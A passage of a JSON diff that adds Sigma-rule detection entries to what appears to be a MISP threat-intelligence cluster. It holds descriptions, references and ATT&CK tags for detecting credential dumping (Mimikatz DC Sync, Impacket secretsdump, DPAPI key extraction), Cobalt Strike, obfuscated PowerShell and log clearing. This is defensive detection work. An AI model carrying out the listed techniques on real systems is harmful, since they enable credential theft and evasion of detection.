hash/password cracking.", + "uuid": "f6de9536-0441-4b3f-a646-f4e00f300ffd", + "value": "Weak Encryption Enabled and Kerberoast", + "meta": { + "refs": [ + "https://adsecurity.org/?p=2053", + "https://www.harmj0y.net/blog/activedirectory/roasting-as-reps/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_alert_enable_weak_encryption.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ], + "creation_date": "2017/07/30", + "filename": "win_security_alert_enable_weak_encryption.yml", + "author": "@neu5ron", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "This events that are generated when using the hacktool Ruler by Sensepost", + "uuid": "24549159-ac1b-479c-8175-d42aea947cae", + "value": "Hacktool Ruler", + "meta": { + "refs": [ + "https://github.com/sensepost/ruler", + "https://github.com/sensepost/ruler/issues/47", + "https://github.com/staaldraad/go-ntlm/blob/cd032d41aa8ce5751c07cb7945400c0f5c81e2eb/ntlm/ntlmv1.go#L427", + "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4776", + "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4624", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_alert_ruler.yml" + ], + "tags": [ + "attack.discovery", + "attack.execution", + "attack.t1087", + "attack.t1114", + "attack.t1059", + "attack.t1550.002" + ], + "creation_date": "2017/05/31", + "filename": "win_security_alert_ruler.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Go utilities that use staaldraad awesome NTLM library" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects Chafer activity attributed to OilRig as reported in Nyotron report in March 2018", + "uuid": 
"c0580559-a6bd-4ef6-b9b7-83703d98b561", + "value": "Chafer Activity - Security", + "meta": { + "refs": [ + "https://nyotron.com/nyotron-discovers-next-generation-oilrig-attacks/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_apt_chafer_mar18_security.yml" + ], + "tags": [ + "attack.persistence", + "attack.g0049", + "attack.t1053.005", + "attack.s0111", + "attack.t1543.003", + "attack.defense_evasion", + "attack.t1112", + "attack.command_and_control", + "attack.t1071.004" + ], + "creation_date": "2018/03/23", + "filename": "win_security_apt_chafer_mar18_security.yml", + "author": "Florian Roth, Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects the deactivation and disabling of the Scheduled defragmentation task as seen by Slingshot APT group", + "uuid": "c5a178bf-9cfb-4340-b584-e4df39b6a3e7", + "value": "Defrag Deactivation - Security", + "meta": { + "refs": [ + "https://securelist.com/apt-slingshot/84312/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_apt_slingshot.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1053", + "attack.s0111" + ], + "creation_date": "2019/03/04", + "filename": "win_security_apt_slingshot.yml", + "author": "Florian Roth, Bartlomiej Czyz (@bczyz1)", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects activity mentioned in Operation Wocao report", + "uuid": "74ad4314-482e-4c3e-b237-3f7ed3b9ca8d", + "value": "Operation Wocao Activity - Security", + "meta": { + "refs": [ + "https://www.fox-it.com/en/news/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/", + 
"https://twitter.com/SBousseaden/status/1207671369963646976", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_apt_wocao.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1012", + "attack.defense_evasion", + "attack.t1036.004", + "attack.t1027", + "attack.execution", + "attack.t1053.005", + "attack.t1059.001" + ], + "creation_date": "2019/12/20", + "filename": "win_security_apt_wocao.yml", + "author": "Florian Roth, frack113", + "level": "high", + "falsepositive": [ + "Administrators that use checkadmin.exe tool to enumerate local administrators" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects remote task creation via at.exe or API interacting with ATSVC namedpipe", + "uuid": "f6de6525-4509-495a-8a82-1f8b0ed73a00", + "value": "Remote Task Creation via ATSVC Named Pipe", + "meta": { + "refs": [ + "https://blog.menasec.net/2019/03/threat-hunting-25-scheduled-tasks-for.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_atsvc_task.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.persistence", + "car.2013-05-004", + "car.2015-04-001", + "attack.t1053.002" + ], + "creation_date": "2019/04/03", + "filename": "win_security_atsvc_task.yml", + "author": "Samir Bousseaden", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Potential adversaries accessing the microphone and webcam in an endpoint.", + "uuid": "8cd538a4-62d5-4e83-810b-12d41e428d6e", + "value": "Processes Accessing the Microphone and Webcam", + "meta": { + "refs": [ + "https://twitter.com/duzvik/status/1269671601852813320", + "https://medium.com/@7a616368/can-you-track-processes-accessing-the-camera-and-microphone-7e6885b37072", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_camera_microphone_access.yml" + ], + "tags": [ + "attack.collection", + "attack.t1123" + ], + "creation_date": "2020/06/07", + "filename": "win_security_camera_microphone_access.yml", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement", + "uuid": "d7a95147-145f-4678-b85d-d1ff4a3bb3f6", + "value": "CobaltStrike Service Installations - Security", + "meta": { + "refs": [ + "https://www.sans.org/webcasts/119395", + "https://www.crowdstrike.com/blog/getting-the-bacon-from-cobalt-strike-beacon/", + "https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_cobaltstrike_service_installs.yml" + ], + "tags": [ + "attack.execution", + "attack.privilege_escalation", + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1543.003", + "attack.t1569.002" + ], + "creation_date": "2021/05/26", + "filename": "win_security_cobaltstrike_service_installs.yml", + "author": "Florian Roth, Wojciech Lesicki", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects the use of the spoolss named pipe over SMB. 
This can be used to trigger the authentication via NTLM of any machine that has the spoolservice enabled.", + "uuid": "214e8f95-100a-4e04-bb31-ef6cba8ce07e", + "value": "DCERPC SMB Spoolss Named Pipe", + "meta": { + "refs": [ + "https://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1", + "https://dirkjanm.io/a-different-way-of-abusing-zerologon/", + "https://twitter.com/_dirkjan/status/1309214379003588608", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_dce_rpc_smb_spoolss_named_pipe.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021.002" + ], + "creation_date": "2018/11/28", + "filename": "win_security_dce_rpc_smb_spoolss_named_pipe.yml", + "author": "OTR (Open Threat Research)", + "level": "medium", + "falsepositive": [ + "Domain Controllers acting as printer servers too? :)" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects a threat actor creating a file named `iertutil.dll` in the `C:\\Program Files\\Internet Explorer\\` directory over the network for a DCOM InternetExplorer DLL Hijack scenario.", + "uuid": "c39f0c81-7348-4965-ab27-2fde35a1b641", + "value": "DCOM InternetExplorer.Application Iertutil DLL Hijack - Security", + "meta": { + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/08_lateral_movement/WIN-201009183000.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_dcom_iertutil_dll_hijack.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1021.003" + ], + "creation_date": "2020/10/12", + "filename": "win_security_dcom_iertutil_dll_hijack.yml", + "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR)", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + 
"description": "Detects Mimikatz DC sync security events", + "uuid": "611eab06-a145-4dfa-a295-3ccc5c20f59a", + "value": "Mimikatz DC Sync", + "meta": { + "refs": [ + "https://twitter.com/gentilkiwi/status/1003236624925413376", + "https://gist.github.com/gentilkiwi/dcc132457408cf11ad2061340dcb53c2", + "https://blog.blacklanternsecurity.com/p/detecting-dcsync?s=r", + "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4662", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_dcsync.yml" + ], + "tags": [ + "attack.credential_access", + "attack.s0002", + "attack.t1003.006" + ], + "creation_date": "2018/06/03", + "filename": "win_security_dcsync.yml", + "author": "Benjamin Delpy, Florian Roth, Scott Dermott, Sorina Ionescu", + "level": "high", + "falsepositive": [ + "Valid DC Sync that is not covered by the filters; please report", + "Local Domain Admin account used for Azure AD Connect" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects scenarios where an windows defender exclusion was added in registry where an entity would want to bypass antivirus scanning from windows defender", + "uuid": "e9c8808f-4cfb-4ba9-97d4-e5f3beaa244d", + "value": "Windows Defender Exclusion Set", + "meta": { + "refs": [ + "https://www.bleepingcomputer.com/news/security/gootkit-malware-bypasses-windows-defender-by-setting-path-exclusions/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_defender_bypass.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ], + "creation_date": "2019/10/26", + "filename": "win_security_defender_bypass.yml", + "author": "@BarryShooshooga", + "level": "high", + "falsepositive": [ + "Intended inclusions by administrator" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects an 
installation of a device that is forbidden by the system policy", + "uuid": "c9eb55c3-b468-40ab-9089-db2862e42137", + "value": "Device Installation Blocked", + "meta": { + "refs": [ + "https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md", + "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-6423", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_device_installation_blocked.yml" + ], + "tags": "No established tags", + "creation_date": "2022/10/14", + "filename": "win_security_device_installation_blocked.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects the default \"UserName\" used by the DiagTrackEoP POC", + "uuid": "2111118f-7e46-4fc8-974a-59fd8ec95196", + "value": "DiagTrackEoP Default Login Username", + "meta": { + "refs": [ + "https://github.com/Wh04m1001/DiagTrackEoP/blob/3a2fc99c9700623eb7dc7d4b5f314fd9ce5ef51f/main.cpp#L46", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_diagtrack_eop_default_login_username.yml" + ], + "tags": [ + "attack.privilege_escalation" + ], + "creation_date": "2022/08/03", + "filename": "win_security_diagtrack_eop_default_login_username.yml", + "author": "Nasreddine Bencherchali", + "level": "critical", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects scenarios where system auditing (ie: windows event log auditing) is disabled.\nThis may be used in a scenario where an entity would want to bypass local logging to evade detection when windows event logging is enabled and reviewed.\nAlso, it is recommended to turn off \"Local Group Policy Object 
Processing\" via GPO, which will make sure that Active Directory GPOs take precedence over local/edited computer policies via something such as \"gpedit.msc\".\nPlease note, that disabling \"Local Group Policy Object Processing\" may cause an issue in scenarios of one off specific GPO modifications -- however it is recommended to perform these modifications in Active Directory anyways.\n", + "uuid": "69aeb277-f15f-4d2d-b32a-55e883609563", + "value": "Disabling Windows Event Auditing", + "meta": { + "refs": [ + "https://docs.google.com/presentation/d/1dkrldTTlN3La-OjWtkWJBb4hVk6vfsSMBFBERs6R8zA/edit", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_disable_event_logging.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.002" + ], + "creation_date": "2017/11/19", + "filename": "win_security_disable_event_logging.yml", + "author": "@neu5ron", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects tools extracting LSA secret DPAPI domain backup key from Domain Controllers", + "uuid": "4ac1f50b-3bd0-4968-902d-868b4647937e", + "value": "DPAPI Domain Backup Key Extraction", + "meta": { + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/06_credential_access/WIN-190620024610.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_dpapi_domain_backupkey_extraction.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.004" + ], + "creation_date": "2019/06/20", + "filename": "win_security_dpapi_domain_backupkey_extraction.yml", + "author": "Roberto Rodriguez @Cyb3rWard0g", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects anyone attempting a backup for the DPAPI Master Key. 
This events gets generated at the source and not the Domain Controller.", + "uuid": "39a94fd1-8c9a-4ff6-bf22-c058762f8014", + "value": "DPAPI Domain Master Key Backup Attempt", + "meta": { + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/06_credential_access/WIN-190620024610.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_dpapi_domain_masterkey_backup_attempt.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.004" + ], + "creation_date": "2019/08/10", + "filename": "win_security_dpapi_domain_masterkey_backup_attempt.yml", + "author": "Roberto Rodriguez @Cyb3rWard0g", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Potential adversaries stopping ETW providers recording loaded .NET assemblies.", + "uuid": "a4c90ea1-2634-4ca0-adbb-35eae169b6fc", + "value": "COMPlus_ETWEnabled Registry Modification", + "meta": { + "refs": [ + "https://twitter.com/_xpn_/status/1268712093928378368", + "https://social.msdn.microsoft.com/Forums/vstudio/en-US/0878832e-39d7-4eaf-8e16-a729c4c40975/what-can-i-use-e13c0d23ccbc4e12931bd9cc2eee27e4-for?forum=clr", + "https://github.com/dotnet/runtime/blob/ee2355c801d892f2894b0f7b14a20e6cc50e0e54/docs/design/coreclr/jit/viewing-jit-dumps.md#setting-configuration-variables", + "https://github.com/dotnet/runtime/blob/f62e93416a1799aecc6b0947adad55a0d9870732/src/coreclr/src/inc/clrconfigvalues.h#L35-L38", + "https://github.com/dotnet/runtime/blob/7abe42dc1123722ed385218268bb9fe04556e3d3/src/coreclr/src/inc/clrconfig.h#L33-L39", + "https://github.com/dotnet/runtime/search?p=1&q=COMPlus_&unscoped_q=COMPlus_", + "https://bunnyinside.com/?term=f71e8cb9c76a", + "http://managed670.rssing.com/chan-5590147/all_p1.html", + 
"https://github.com/dotnet/runtime/blob/4f9ae42d861fcb4be2fcd5d3d55d5f227d30e723/docs/coding-guidelines/clr-jit-coding-conventions.md#1412-disabling-code", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_etw_modification.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ], + "creation_date": "2020/06/05", + "filename": "win_security_etw_modification.yml", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Checks for event id 1102 which indicates the security event log was cleared.", + "uuid": "a122ac13-daf8-4175-83a2-72c387be339d", + "value": "Security Event Log Cleared", + "meta": { + "refs": [ + "https://github.com/Azure/Azure-Sentinel/blob/f99542b94afe0ad2f19a82cc08262e7ac8e1428e/Detections/SecurityEvent/SecurityEventLogCleared.yaml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_event_log_cleared.yml" + ], + "tags": [ + "attack.t1070.001" + ], + "creation_date": "2021/08/15", + "filename": "win_security_event_log_cleared.yml", + "author": "Saw Winn Naung", + "level": "medium", + "falsepositive": [ + "Legitimate administrative activity" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects remote printer driver load from Detailed File Share in Security logs that are a sign of successful exploitation attempts against print spooler vulnerability CVE-2021-1675 and CVE-2021-34527", + "uuid": "8fe1c584-ee61-444b-be21-e9054b229694", + "value": "CVE-2021-1675 Print Spooler Exploitation IPC Access", + "meta": { + "refs": [ + "https://twitter.com/INIT_3/status/1410662463641731075", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_exploit_cve_2021_1675_printspooler_security.yml" + ], + "tags": [ + "attack.execution", + "attack.t1569", + "cve.2021.1675", + "cve.2021.34527" + ], + "creation_date": "2021/07/02", + "filename": "win_security_exploit_cve_2021_1675_printspooler_security.yml", + "author": "INIT_6", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects external diskdrives or plugged in USB devices , EventID 6416 on windows 10 or later", + "uuid": "f69a87ea-955e-4fb4-adb2-bb9fd6685632", + "value": "External Disk Drive Or USB Storage Device", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_external_device.yml" + ], + "tags": [ + "attack.t1091", + "attack.t1200", + "attack.lateral_movement", + "attack.initial_access" + ], + "creation_date": "2019/11/20", + "filename": "win_security_external_device.yml", + "author": "Keith Wright", + "level": "low", + "falsepositive": [ + "Legitimate administrative activity" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects enumeration of the global catalog (that can be performed using BloodHound or others AD reconnaissance tools). 
Adjust Threshold according to domain width.", + "uuid": "619b020f-0fd7-4f23-87db-3f51ef837a34", + "value": "Enumeration via the Global Catalog", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5156", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_global_catalog_enumeration.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1087.002" + ], + "creation_date": "2020/05/11", + "filename": "win_security_global_catalog_enumeration.yml", + "author": "Chakib Gzenayi (@Chak092), Hosni Mribah", + "level": "medium", + "falsepositive": [ + "Exclude known DCs." + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detect lateral movement using GPO scheduled task, usually used to deploy ransomware at scale", + "uuid": "a8f29a7b-b137-4446-80a0-b804272f3da2", + "value": "Persistence and Execution at Scale via GPO Scheduled Task", + "meta": { + "refs": [ + "https://twitter.com/menasec1/status/1106899890377052160", + "https://www.secureworks.com/blog/ransomware-as-a-distraction", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_gpo_scheduledtasks.yml" + ], + "tags": [ + "attack.persistence", + "attack.lateral_movement", + "attack.t1053.005" + ], + "creation_date": "2019/04/03", + "filename": "win_security_gpo_scheduledtasks.yml", + "author": "Samir Bousseaden", + "level": "high", + "falsepositive": [ + "If the source IP is not localhost then it's super suspicious, better to monitor both local and remote changes to GPO scheduledtasks" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects the creation of a local hidden user account which should not happen for event ID 4720.", + "uuid": "7b449a5e-1db5-4dd0-a2dc-4e3a67282538", + "value": "Hidden Local User Creation", + "meta": { + "refs": [ + 
"https://twitter.com/SBousseaden/status/1387743867663958021", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_hidden_user_creation.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1136.001" + ], + "creation_date": "2021/05/03", + "filename": "win_security_hidden_user_creation.yml", + "author": "Christian Burkard", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Rule to detect the Hybrid Connection Manager service installation.", + "uuid": "0ee4d8a5-4e67-4faf-acfa-62a78457d1f2", + "value": "HybridConnectionManager Service Installation", + "meta": { + "refs": [ + "https://twitter.com/Cyb3rWard0g/status/1381642789369286662", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_hybridconnectionmgr_svc_installation.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1554" + ], + "creation_date": "2021/04/12", + "filename": "win_security_hybridconnectionmgr_svc_installation.yml", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "level": "high", + "falsepositive": [ + "Legitimate use of Hybrid Connection Manager via Azure function apps." 
+ ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects execution of Impacket's psexec.py.", + "uuid": "32d56ea1-417f-44ff-822b-882873f5f43b", + "value": "Impacket PsExec Execution", + "meta": { + "refs": [ + "https://blog.menasec.net/2019/02/threat-hunting-3-detecting-psexec.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_impacket_psexec.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021.002" + ], + "creation_date": "2020/12/14", + "filename": "win_security_impacket_psexec.yml", + "author": "Bhabesh Raj", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detect AD credential dumping using impacket secretdump HKTL", + "uuid": "252902e3-5830-4cf6-bf21-c22083dfd5cf", + "value": "Possible Impacket SecretDump Remote Activity", + "meta": { + "refs": [ + "https://blog.menasec.net/2019/02/threat-huting-10-impacketsecretdump.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_impacket_secretdump.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.002", + "attack.t1003.004", + "attack.t1003.003" + ], + "creation_date": "2019/04/03", + "filename": "win_security_impacket_secretdump.yml", + "author": "Samir Bousseaden, wagga", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", + "uuid": "4edf51e1-cb83-4e1a-bc39-800e396068e3", + "value": "Invoke-Obfuscation CLIP+ Launcher - Security", + "meta": { + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_invoke_obfuscation_clip_services_security.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2020/10/13", + "filename": "win_security_invoke_obfuscation_clip_services_security.yml", + "author": "Jonathan Cheong, oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block linked in the references", + "uuid": "fd0f5778-d3cb-4c9a-9695-66759d04702a", + "value": "Invoke-Obfuscation Obfuscated IEX Invocation - Security", + "meta": { + "refs": [ + "https://github.com/danielbohannon/Invoke-Obfuscation/blob/f20e7f843edd0a3a7716736e9eddfa423395dd26/Out-ObfuscatedStringCommand.ps1#L873-L888", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_invoke_obfuscation_obfuscated_iex_services_security.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027" + ], + "creation_date": "2019/11/08", + "filename": "win_security_invoke_obfuscation_obfuscated_iex_services_security.yml", + "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects Obfuscated use of stdin to execute PowerShell", + "uuid": "0c718a5e-4284-4fb9-b4d9-b9a50b3a1974", + "value": "Invoke-Obfuscation STDIN+ Launcher - Security", + "meta": { + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_invoke_obfuscation_stdin_services_security.yml" + ], + "tags": [ + 
"attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2020/10/15", + "filename": "win_security_invoke_obfuscation_stdin_services_security.yml", + "author": "Jonathan Cheong, oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", + "uuid": "dcf2db1f-f091-425b-a821-c05875b8925a", + "value": "Invoke-Obfuscation VAR+ Launcher - Security", + "meta": { + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_invoke_obfuscation_var_services_security.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2020/10/15", + "filename": "win_security_invoke_obfuscation_var_services_security.yml", + "author": "Jonathan Cheong, oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects Obfuscated Powershell via COMPRESS OBFUSCATION", + "uuid": "7a922f1b-2635-4d6c-91ef-af228b198ad3", + "value": "Invoke-Obfuscation COMPRESS OBFUSCATION - Security", + "meta": { + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_invoke_obfuscation_via_compress_services_security.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2020/10/18", + "filename": "win_security_invoke_obfuscation_via_compress_services_security.yml", + "author": "Timur Zinniatullin, oscd.community", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + 
"logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects Obfuscated Powershell via RUNDLL LAUNCHER", + "uuid": "f241cf1b-3a6b-4e1a-b4f9-133c00dd95ca", + "value": "Invoke-Obfuscation RUNDLL LAUNCHER - Security", + "meta": { + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_invoke_obfuscation_via_rundll_services_security.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2020/10/18", + "filename": "win_security_invoke_obfuscation_via_rundll_services_security.yml", + "author": "Timur Zinniatullin, oscd.community", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects Obfuscated Powershell via Stdin in Scripts", + "uuid": "80b708f3-d034-40e4-a6c8-d23b7a7db3d1", + "value": "Invoke-Obfuscation Via Stdin - Security", + "meta": { + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_invoke_obfuscation_via_stdin_services_security.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2020/10/12", + "filename": "win_security_invoke_obfuscation_via_stdin_services_security.yml", + "author": "Nikita Nazarov, oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", + "uuid": "1a0a2ff1-611b-4dac-8216-8a7b47c618a6", + "value": "Invoke-Obfuscation Via Use Clip - Security", + "meta": { + "refs": [ + 
"https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_invoke_obfuscation_via_use_clip_services_security.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2020/10/09", + "filename": "win_security_invoke_obfuscation_via_use_clip_services_security.yml", + "author": "Nikita Nazarov, oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", + "uuid": "9b8d9203-4e0f-4cd9-bb06-4cc4ea6d0e9a", + "value": "Invoke-Obfuscation Via Use MSHTA - Security", + "meta": { + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_invoke_obfuscation_via_use_mshta_services_security.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2020/10/09", + "filename": "win_security_invoke_obfuscation_via_use_mshta_services_security.yml", + "author": "Nikita Nazarov, oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", + "uuid": "cd0f7229-d16f-42de-8fe3-fba365fbcb3a", + "value": "Invoke-Obfuscation Via 